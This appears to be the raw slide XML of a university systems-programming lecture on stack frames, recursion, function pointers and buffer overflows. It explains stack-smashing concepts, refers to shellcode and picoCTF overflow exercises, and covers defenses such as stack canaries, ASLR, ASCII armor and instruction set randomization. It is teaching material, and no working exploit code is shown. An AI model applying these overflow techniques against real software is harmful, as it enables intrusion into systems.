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1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490" r:id="rId10"/>
    <p:sldId id="491" r:id="rId11"/>
    <p:sldId id="492" r:id="rId12"/>
    <p:sldId id="493" r:id="rId13"/>
    <p:sldId id="488" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="367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269" r:id="rId28"/>
    <p:sldId id="508" r:id="rId29"/>
    <p:sldId id="326" r:id="rId30"/>
    <p:sldId id="306" r:id="rId31"/>
    <p:sldId id="394" r:id="rId32"/>
    <p:sldId id="281" r:id="rId33"/>
    <p:sldId id="395" r:id="rId34"/>
    <p:sldId id="283" r:id="rId35"/>
    <p:sldId id="381" r:id="rId36"/>
    <p:sldId id="382" r:id="rId37"/>
    <p:sldId id="383" r:id="rId38"/>
    <p:sldId id="384" r:id="rId39"/>
    <p:sldId id="385" r:id="rId40"/>
    <p:sldId id="386" r:id="rId41"/>
    <p:sldId id="286" r:id="rId42"/>
    <p:sldId id="390" r:id="rId43"/>
    <p:sldId id="391" r:id="rId44"/>
    <p:sldId id="305" r:id="rId45"/>
    <p:sldId id="392" r:id="rId46"/>
    <p:sldId id="393" r:id="rId47"/>
    <p:sldId id="396" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="295" r:id="rId50"/>
    <p:sldId id="297" r:id="rId51"/>
    <p:sldId id="399" r:id="rId52"/>
    <p:sldId id="400" r:id="rId53"/>
    <p:sldId id="401" r:id="rId54"/>
    <p:sldId id="402" r:id="rId55"/>
    <p:sldId id="403" r:id="rId56"/>
    <p:sldId id="480" r:id="rId57"/>
    <p:sldId id="481" r:id="rId58"/>
    <p:sldId id="482" r:id="rId59"/>
    <p:sldId id="413" r:id="rId60"/>
    <p:sldId id="414" r:id="rId61"/>
    <p:sldId id="415" r:id="rId62"/>
    <p:sldId id="416" r:id="rId63"/>
    <p:sldId id="417" r:id="rId64"/>
    <p:sldId id="418" r:id="rId65"/>
    <p:sldId id="419" r:id="rId66"/>
    <p:sldId id="420" r:id="rId67"/>
    <p:sldId id="421" r:id="rId68"/>
    <p:sldId id="423" r:id="rId69"/>
    <p:sldId id="424" r:id="rId70"/>
    <p:sldId id="425" r:id="rId71"/>
    <p:sldId id="426" r:id="rId72"/>
    <p:sldId id="506" r:id="rId73"/>
    <p:sldId id="429" r:id="rId74"/>
    <p:sldId id="439" r:id="rId75"/>
    <p:sldId id="440" r:id="rId76"/>
    <p:sldId id="430" r:id="rId77"/>
    <p:sldId id="431" r:id="rId78"/>
    <p:sldId id="432" r:id="rId79"/>
    <p:sldId id="433" r:id="rId80"/>
    <p:sldId id="434" r:id="rId81"/>
    <p:sldId id="436" r:id="rId82"/>
    <p:sldId id="437" r:id="rId83"/>
    <p:sldId id="438" r:id="rId84"/>
    <p:sldId id="457" r:id="rId85"/>
    <p:sldId id="458" r:id="rId86"/>
    <p:sldId id="459" r:id="rId87"/>
    <p:sldId id="461" r:id="rId88"/>
    <p:sldId id="460" r:id="rId89"/>
    <p:sldId id="462" r:id="rId90"/>
    <p:sldId id="463" r:id="rId91"/>
    <p:sldId id="464" r:id="rId92"/>
    <p:sldId id="465" r:id="rId93"/>
    <p:sldId id="444" r:id="rId94"/>
    <p:sldId id="507" r:id="rId95"/>
    <p:sldId id="473" r:id="rId96"/>
    <p:sldId id="443" r:id="rId97"/>
    <p:sldId id="446" r:id="rId98"/>
    <p:sldId id="448" r:id="rId99"/>
    <p:sldId id="502" r:id="rId100"/>
    <p:sldId id="504" r:id="rId101"/>
    <p:sldId id="505" r:id="rId102"/>
    <p:sldId id="449" r:id="rId103"/>
    <p:sldId id="450" r:id="rId104"/>
    <p:sldId id="445" r:id="rId105"/>
    <p:sldId id="406" r:id="rId106"/>
    <p:sldId id="290" r:id="rId107"/>
    <p:sldId id="291" r:id="rId108"/>
    <p:sldId id="495" r:id="rId109"/>
    <p:sldId id="496" r:id="rId110"/>
    <p:sldId id="499" r:id="rId111"/>
    <p:sldId id="497" r:id="rId112"/>
    <p:sldId id="498" r:id="rId113"/>
    <p:sldId id="407" r:id="rId114"/>
    <p:sldId id="408" r:id="rId115"/>
    <p:sldId id="409" r:id="rId116"/>
    <p:sldId id="410" r:id="rId117"/>
    <p:sldId id="501" r:id="rId118"/>
    <p:sldId id="500" r:id="rId119"/>
    <p:sldId id="451" r:id="rId12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7DBD5"/>
    <a:srgbClr val="6A666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1" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="-19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28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03513" y="8710613"/>
            <a:ext cx="1452562" cy="252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EC544EE3-75FC-4B7F-A23F-2E2DC225C457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7352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8188" cy="34099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1509409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1363" cy="3413125"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/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51313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102403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86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39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654050"/>
            <a:ext cx="4651375" cy="3489325"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101379" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="930275" y="4360863"/>
            <a:ext cx="5010150" cy="41417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100355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solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr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86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86493" tIns="43247" rIns="86493" bIns="43247" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"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 idx="1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7288" y="693738"/>
            <a:ext cx="4551362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912814" y="4343400"/>
            <a:ext cx="5032375" cy="41894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3738"/>
            <a:ext cx="4551362" cy="3413125"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr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4" y="4343401"/>
            <a:ext cx="5032375" cy="4132263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70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8909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SFP – Stack Frame Pointer (AKA EBP)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SP – Stack pointer (AKA ESP)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0115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Note: Buffer addresses group up, stack grows down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113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No overflow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216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Simple overflow!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endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Century Gothic" pitchFamily="32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3187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Simple overflow!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endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Century Gothic" pitchFamily="32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421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Notice! Buffer is indexed going up! But the stack grows from top to bottom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240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So it won’t execute the whole shell code (and thus, won’t work)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126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136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44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64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75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1177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1177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198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218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1"/>
            <a:ext cx="5026025" cy="413385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12288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915989" y="4343400"/>
            <a:ext cx="5026025" cy="41148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9992" tIns="44996" rIns="89992" bIns="44996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0" algn="l"/>
                <a:tab pos="457159" algn="l"/>
                <a:tab pos="914318" algn="l"/>
                <a:tab pos="1371477" algn="l"/>
                <a:tab pos="1828637" algn="l"/>
                <a:tab pos="2285797" algn="l"/>
                <a:tab pos="2742956" algn="l"/>
                <a:tab pos="3200115" algn="l"/>
                <a:tab pos="3657274" algn="l"/>
                <a:tab pos="4114433" algn="l"/>
                <a:tab pos="4571592" algn="l"/>
                <a:tab pos="5028752" algn="l"/>
                <a:tab pos="5485911" algn="l"/>
                <a:tab pos="5943071" algn="l"/>
                <a:tab pos="6400230" algn="l"/>
                <a:tab pos="6857389" algn="l"/>
                <a:tab pos="7314548" algn="l"/>
                <a:tab pos="7771707" algn="l"/>
                <a:tab pos="8228867" algn="l"/>
                <a:tab pos="8686026" algn="l"/>
                <a:tab pos="9143185" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Century Gothic" pitchFamily="32" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:t>Rooster does 16KB of SP randomization. Rerun until successful!</a:t>
            </a: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914400"/>
            <a:ext cx="4179888" cy="3135313"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239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6164" y="4352925"/>
            <a:ext cx="4772025" cy="3481388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1187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11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 idx="1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1208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39850" y="914401"/>
            <a:ext cx="4179888" cy="3135313"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249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6164" y="4352925"/>
            <a:ext cx="4772025" cy="3481388"/>
          </a:xfrm>
          <a:noFill/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901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5037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125"/>
            <a:ext cx="77692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3787" cy="777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5112" cy="5221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18025" y="1220788"/>
            <a:ext cx="4076700" cy="5221287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3525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220788"/>
            <a:ext cx="4075112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1037" cy="521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0612" cy="77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4138" y="6402388"/>
            <a:ext cx="1212851" cy="28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>
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:fld id="{43EE677C-8715-4420-96DF-18E8B9D4DFC3}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="Arial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r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="Arial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gcc.gnu.org/onlinedocs/gcc/Function-Attribute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picoctf.com/problem-static/binary/Overflow1/overflow1.html" TargetMode="Externa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picoctf.com/problem-static/binary/Overflow2/overflow2.html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1527175"/>
            <a:ext cx="5562600" cy="15113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Procedures (Functions)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#2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844304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1816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(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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4038600"/>
            <a:ext cx="1797050" cy="608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Canary (8 bytes)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572000" y="1219200"/>
            <a:ext cx="4343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small!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4600" y="5044683"/>
            <a:ext cx="6629400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je	.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L6               # If same, OK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call	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__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.L6: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Saved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cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ebp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Saved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ebx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Canary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(8 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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4038600"/>
            <a:ext cx="1797050" cy="608299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Canary (8 bytes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4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14600" y="39624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Input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0123456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4572000" y="1219200"/>
            <a:ext cx="4343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small!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134938"/>
            <a:ext cx="8716962" cy="10080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4) Address Space Layout Randomization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82588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Operating systems and loaders employed deterministic layout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Allowed stack overflows to “guess” what to use for return address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Randomizing stack location makes it hard for attacker to guess insertion point of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-382588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Can be applied to entire memory space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Main executable code/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> segments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err="1" smtClean="0"/>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>() managed memory (heap)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err="1" smtClean="0"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>() managed memory (libraries, heap, shared memory)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User/kernel/thread stacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-382588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Now standard in operating systems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Windows Vista, Linux 2.4.21 and beyond</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="741363" lvl="1" indent="-244475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Must be used in conjunction with PIE (Position Independent Executables)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14400" y="6248400"/>
            <a:ext cx="6760825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thefengs.com/wuchang/courses/cs201/class/08/stack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8550" cy="782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mtClean="0"/>
              <a:t>Other randomization techniques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8975" cy="5226050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="431800" indent="-320675" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Randomize locations of global variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-320675" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Randomize stack frames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/>
              <a:t>Pad each stack frame by random amount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/>
              <a:t>Assign new stack frames a random location (instead of next contiguous location)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sz="1800" dirty="0" smtClean="0"/>
              <a:t>Treats stack as a heap and increases memory management overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-320675" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>System call randomization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dirty="0" smtClean="0"/>
              <a:t>Works for systems compiled from scratch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Lessons from Multics</a:t>
            </a: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7387" cy="5510212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Precursor to UNIX focused on security</a:t>
            </a:r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Included features to make buffer overflow attacks impractical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Programming language PL/I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Maximum string length must *always* be specified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Automatic string truncation if limits are reached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Hardware-based memory protection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Hardware execution permission bits to ensure data could not be directly executed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Stack grows towards positive addresses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Return address stored “below”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Overflow writes unused portion of stack and never reaches return address</a:t>
            </a:r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>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Why did </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Multics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> fail?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Earl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Boebert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> (quoting Rich Hall) USENIX Security 2004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Economics of being first-to-market with flawed designs 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“Crap in a hurry”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600" dirty="0" smtClean="0"/>
              <a:t>Being repeated with the Internet of Things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 (Functions)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Recursive Procedures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Since each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> results in a new stack frame, recursive calls become natural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A recursive call is just like any other call, as far as IA32 assembly code is concerned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Of course, the a recursive algorithm needs a termination condition, but that’s the programmer’s problem</a:t>
            </a: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1169988" y="6078538"/>
            <a:ext cx="6686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http://thefengs.com/wuchang/courses/cs201/class/08/stack.c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838200" y="914400"/>
            <a:ext cx="3400425" cy="2305416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCECFF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rfact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(long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if (x &lt;= 1)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return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=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rfact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(x-1);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return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*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4724400" y="914400"/>
            <a:ext cx="4114800" cy="3136413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 &lt;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rfact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&gt;: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0:	push  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rbx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1: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mov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rdi,%rbx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4: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mov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 $0x1,%eax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9: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cmp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 $0x1,%rdi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d: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jle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 1c &lt;rfact+0x1c&gt;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f:	lea    -0x1(%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),%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13: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callq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18 &lt;rfact+0x18&gt;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18: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imul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rbx,%rax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1c:	pop   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rbx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 1d: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retq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53340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Recursive Factorial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0"/>
            <a:ext cx="4191000" cy="2411413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Registers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rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  saved at beginning &amp; restored at end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What is it used for?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1154303" y="3352800"/>
            <a:ext cx="2160207" cy="350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x! = (x-1)! * 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argument example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199" y="4800600"/>
            <a:ext cx="3810001" cy="1447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 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a, long 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219200" y="931718"/>
            <a:ext cx="64770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3962400" y="4800600"/>
            <a:ext cx="5112327" cy="12954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a*b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Save %rbx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Restore %rbx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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3733884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10612" cy="774700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function argument</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>example (w/ caller)</a:t>
            </a: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228600" y="46482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a, long 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= a * b;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7244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3124200" y="46482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%rdi,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</a:p>
          <a:p>
            <a:pPr algn="l"/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400553:  imul   </a:t>
            </a:r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%rsi,%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	# Return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0" y="21336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</a:rPr>
              <a:t>• • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr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</a:t>
            </a:r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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK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sk-SK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</a:t>
            </a:r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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>• • </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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7896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#3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683137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pointer extra slides</a:t>
            </a:r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typedefs with function pointers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Same as with other data types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(*func)(char *);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="725488" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000066"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Arial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 named thing – func – is a pointer to a function returning int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 int (*func)(char *);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="725488" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000066"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Arial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 named thing – func – is a  data type:  pointer to function returning int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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30250" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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30250" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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Using pointers to functions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73063" y="938213"/>
            <a:ext cx="5106987" cy="50942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// function prototypes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doEcho(char*);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doExit(char*);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doHelp(char*);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setPrompt(char*);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// dispatch table section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 int (*func)(char*);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 struct{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char* name;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func  function;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func_t;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func_t func_table[] =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{ "echo",   doEcho },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{ "exit",   doExit },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{ "quit",   doExit },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 "help",   doHelp },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{ "prompt", setPrompt },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cntFuncs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(sizeof(func_table) / sizeof(func_table[0]))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802063" y="2819400"/>
            <a:ext cx="4892675" cy="20859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// find the function and dispatch it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for (i = 0; i &lt; cntFuncs; i++)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if (strcmp(command,func_table[i].name)==0){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done = func_table[i].function(argument);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break;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if (i == cntFuncs)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printf("invalid command\n")</a:t>
            </a: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581400" y="2743200"/>
            <a:ext cx="5334000" cy="23622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Complicated declarations</a:t>
            </a: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C’s use of () and * makes declarations involving pointers and functions extremely difficult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Helpful rules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“*” has lower precedence than “()”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Work from the inside-out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Consult K&amp;R Chapter 5.12 for complicated declarations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dc1 program to parse a declaration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-23336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63627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 pointer declarations</a:t>
            </a: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668338" y="1060450"/>
            <a:ext cx="2466975" cy="3933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*p	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*p[13]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*(p[13])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**p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*f()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(*f)()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4184650" y="1371600"/>
            <a:ext cx="214153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 is a pointer to int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184650" y="1828800"/>
            <a:ext cx="35877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 is an array[13] of pointer to int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184650" y="2376488"/>
            <a:ext cx="35877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 is an array[13] of pointer to int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4183063" y="2909888"/>
            <a:ext cx="3783012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 is a pointer to a pointer to an int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4181475" y="3429000"/>
            <a:ext cx="43053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f is a function returning a pointer to int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4181475" y="3927475"/>
            <a:ext cx="43053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f is a pointer to a function returning int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</a:t>
            </a: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kind of things are these?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*func(char*);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(*func)(char*);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(*daytab)[13];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*daytab[13];</a:t>
            </a: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>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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895600" y="1752600"/>
            <a:ext cx="5257800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fn that takes char* as arg and returns an int*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3048000" y="2209800"/>
            <a:ext cx="5943600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pointer to a fn taking char* as arg and returns an int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3159125" y="2687638"/>
            <a:ext cx="3398838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pointer to an array[13] of ints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201988" y="3124200"/>
            <a:ext cx="1906587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array[13] of int*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63627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 pointer declarations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668338" y="1054100"/>
            <a:ext cx="3381375" cy="3084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Read from the “inside” out.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(*(*f())[13])()	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(*(*x[3])())[5]	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(*(*x())[])();</a:t>
            </a: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4195763" y="1905000"/>
            <a:ext cx="4654550" cy="642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f is a function returning ptr to an array[13]</a:t>
            </a:r>
            <a:b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of pointers to functions returning int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92588" y="2667000"/>
            <a:ext cx="4387850" cy="642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 is an array[3] of pointers  to functions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returning pointers to array[5] of ints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238500" y="3714750"/>
            <a:ext cx="5532438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x is a function returning a pointer to an array of </a:t>
            </a:r>
            <a:b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pointers to functions returning char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stack smashing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ASCII armor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431800" indent="-320675" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Remap all execute regions to “ASCII armor” (IA32)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dirty="0" smtClean="0"/>
              <a:t>Why is this important?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dirty="0" smtClean="0"/>
              <a:t>Contiguous addresses at beginning of memory that have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0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> (no string buffer overruns)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0x0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="48" charset="0"/>
              </a:rPr>
              <a:t> to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0x01003fff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  (around 16MB)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dirty="0" smtClean="0"/>
              <a:t>Mark all other regions as non-executable including stack and heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="460375" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="660033"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"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2200" dirty="0" smtClean="0"/>
              <a:t>Forces adversary to inject code into addresses that have a NULL in them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dirty="0" smtClean="0"/>
              <a:t>Why is this important?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8550" cy="7826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mtClean="0"/>
              <a:t>Other randomization techniques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8975" cy="5226050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="431800" indent="-320675" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx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smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Instruction set randomization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smtClean="0"/>
              <a:t>Method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Every running program has a different instruction set.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Prevent all network code-injection attacks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“Self-Destruct”: exploits only cause program crash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mtClean="0"/>
              <a:t>Encode (randomize)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During compilation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During program load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mtClean="0"/>
              <a:t>Decode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Hardware (e.g. Transmeta Crusoe)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Emulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1292225" lvl="2" indent="-214313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US" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>Binary-binary translation (Valgrind)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="860425"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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" smtClean="0"/>
              <a:t>Overhead makes it impractical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#4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		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2565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Practice problem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What does this code do?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What is the value of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?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What would this be useful for?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919163" y="1708150"/>
            <a:ext cx="2764196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call next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next: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popq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dirty="0" err="1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dirty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Function calls and stack frames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143873" cy="5218112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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For languages supporting recursion (C, Java), code must be re-entrant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Multiple simultaneous instantiations of a single function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Must store multiple versions of arguments, local variables, return address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Return address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Local variables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Function arguments (if necessary)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Saved register state (if necessary)</a:t>
            </a:r>
          </a:p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Implemented with stack frames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Upon function invocation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Stack frame created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Stack frame pushed onto stack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Upon function completion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty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Stack frame popped off stack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Caller’s frame recovered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="385763" indent="-379413" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1125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dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000066"/>
              </a:solidFill>
              <a:effectLst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7129318" y="3520282"/>
            <a:ext cx="990600" cy="911225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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foo’s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stack frame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7129318" y="4434682"/>
            <a:ext cx="990600" cy="911225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who’s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stack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frame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6808643" y="3180557"/>
            <a:ext cx="1538288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bottom</a:t>
            </a:r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 flipV="1">
            <a:off x="8958118" y="3766344"/>
            <a:ext cx="1588" cy="16891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 rot="5400000">
            <a:off x="7588105" y="4512470"/>
            <a:ext cx="2424113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increasing addresses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7129318" y="5372894"/>
            <a:ext cx="990600" cy="911225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33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amI’s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stack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frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15370" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6859443" y="3775869"/>
            <a:ext cx="1588" cy="16891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 rot="5400000">
            <a:off x="5950600" y="4519612"/>
            <a:ext cx="149860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growth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5686425" y="6440488"/>
            <a:ext cx="3305175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Call chain: foo =&gt; who =&gt; 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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1912452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2303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182445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634843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642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Functions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17488" eaLnBrk="1" hangingPunct="1"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Recall: Two ways to change program control flow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Jumps (unconditional, conditional)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Calls (functions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-217488" eaLnBrk="1" hangingPunct="1"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Function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A unit of code we can call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Similar to a jump, except it can return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Must support passing data as function arguments and return values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-217488" eaLnBrk="1" hangingPunct="1"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Also referred to as a procedure, method, or subroutine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="153988" indent="-220663" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="660033"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Times New Roman" pitchFamily="16" charset="0"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Before we continue, we first have to understand how a stack works…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="554038" lvl="1" indent="-2206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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
